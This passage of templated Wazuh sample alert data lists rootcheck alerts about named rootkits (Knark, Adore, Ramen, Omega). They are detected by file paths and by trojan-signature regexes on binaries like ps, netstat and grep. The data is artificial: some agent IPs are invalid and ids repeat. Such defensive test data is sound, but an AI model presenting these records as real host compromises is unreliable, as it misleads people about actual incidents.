(rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":5,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/tcpdump","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/tcpdump' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[^bu]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Ramen' detected by the presence of file '/usr/lib/ldliblogin.so'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Ramen' detected by the presence of file '/usr/lib/ldliblogin.so'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/grep","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/grep' detected. Signature used: 'bash|givemer' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/lsof","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/lsof' detected. Signature used: '/prof|/dev/[^apcmnfk]|proc.h|bash|^/bin/sh|/dev/ttyo|/dev/ttyp' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/top","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/top' detected. Signature used: '/dev/[^npi3st%]|proc.h|/prof/' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/w","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/w' detected. Signature used: 'uname -a|proc.h|bash' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Adore' detected by the presence of file '/usr/lib/libt'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Adore' detected by the presence of file '/usr/lib/libt'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/lsof","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/lsof' detected. Signature used: '/prof|/dev/[^apcmnfk]|proc.h|bash|^/bin/sh|/dev/ttyo|/dev/ttyp' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'LDP' detected by the presence of file '/dev/.kork'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'LDP' detected by the presence of file '/dev/.kork'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/find","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/find' detected. Signature used: 'bash|/dev/[^tnlcs]|/prof|/home/virus|file.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Bash' detected by the presence of file '/tmp/mcliZokhb'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Bash' detected by the presence of file '/tmp/mcliZokhb'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/ps","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/ps' detected. Signature used: '/dev/ttyo|.1proc|proc.h|bash|^/bin/sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Adore' detected by the presence of file '/usr/lib/libt'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Adore' detected by the presence of file '/usr/lib/libt'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/ps","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/ps' detected. Signature used: '/dev/ttyo|.1proc|proc.h|bash|^/bin/sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/tcpdump","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/tcpdump' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[^bu]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/grep","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/grep' detected. Signature used: 'bash|givemer' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/tcpdump","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/tcpdump' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[^bu]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/netstat","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/netstat' detected. Signature used: 'bash|^/bin/sh|/dev/[^aik]|/prof|grep|addr.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":5,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/netstat","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/netstat' detected. Signature used: 'bash|^/bin/sh|/dev/[^aik]|/prof|grep|addr.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Volc' detected by the presence of file '/usr/bin/volc'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Volc' detected by the presence of file '/usr/bin/volc'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Knark' detected by the presence of file '/proc/knark'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Knark' detected by the presence of file '/proc/knark'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":4,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Rh-Sharpe' detected by the presence of file '/bin/.lpstree'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Rh-Sharpe' detected by the presence of file '/bin/.lpstree'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/lsof","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/lsof' detected. Signature used: '/prof|/dev/[^apcmnfk]|proc.h|bash|^/bin/sh|/dev/ttyo|/dev/ttyp' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Knark' detected by the presence of file '/proc/knark'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Knark' detected by the presence of file '/proc/knark'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/fuser","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/fuser' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[a-dtz]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":4,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Monkit' detected by the presence of file '/usr/lib/libpikapp.a'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Monkit' detected by the presence of file '/usr/lib/libpikapp.a'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/tcpdump","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/tcpdump' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[^bu]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'ZK' detected by the presence of file 'usr/X11R6/.zk/xfs'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'ZK' detected by the presence of file 'usr/X11R6/.zk/xfs'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Ramen' detected by the presence of file '/tmp/ramen.tgz'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Ramen' detected by the presence of file '/tmp/ramen.tgz'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":4,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Adore' detected by the presence of file '/usr/bin/adore'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Adore' detected by the presence of file '/usr/bin/adore'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'ZK' detected by the presence of file 'etc/1ssue.net'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'ZK' detected by the presence of file 'etc/1ssue.net'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":5,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/fuser","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/fuser' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[a-dtz]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/ps","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/ps' detected. Signature used: '/dev/ttyo|.1proc|proc.h|bash|^/bin/sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/chsh2'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/chsh2'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":5,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'TRK' detected by the presence of file '/usr/bin/sourcemask'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'TRK' detected by the presence of file '/usr/bin/sourcemask'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":4,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Slapper' detected by the presence of file '/tmp/.font-unix/.cinik'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Slapper' detected by the presence of file '/tmp/.font-unix/.cinik'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/netstat","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/netstat' detected. Signature used: 'bash|^/bin/sh|/dev/[^aik]|/prof|grep|addr.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Ramen' detected by the presence of file '/usr/lib/ldliblogin.so'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Ramen' detected by the presence of file '/usr/lib/ldliblogin.so'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/grep","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/grep' detected. Signature used: 'bash|givemer' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event 